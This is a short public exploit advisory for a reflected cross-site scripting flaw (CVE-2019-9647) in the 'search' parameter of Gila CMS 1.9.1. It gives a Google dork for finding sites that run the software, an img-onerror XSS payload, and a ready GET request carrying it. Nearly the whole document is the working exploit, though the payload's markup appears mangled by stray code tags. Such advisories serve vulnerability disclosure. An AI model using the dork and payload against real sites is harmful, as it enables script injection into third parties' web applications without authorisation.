# Exploit Title: Gila CMS (search) Cross Site Scripting
# Google Dork: intext:"Powered By Gila CMS"
# Date: 11.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://gilacms.com
# Software Link: https://gilacms.com/packages/downloadRelease/1.9.1.zip
# Demo Site: https://gilacms.com/demo/
# Version: 1.9.1
# Tested on: Kali Linux
# CVE: CVE-2019-9647
# Vulnerable Parameter: search
# Payload: <--<code><img/src=</code> onerror=confirm<code></code>> --!>
# GET Request: http://localhost/?search=<--<code><img/src=</code> onerror=confirm<code></code>> --!>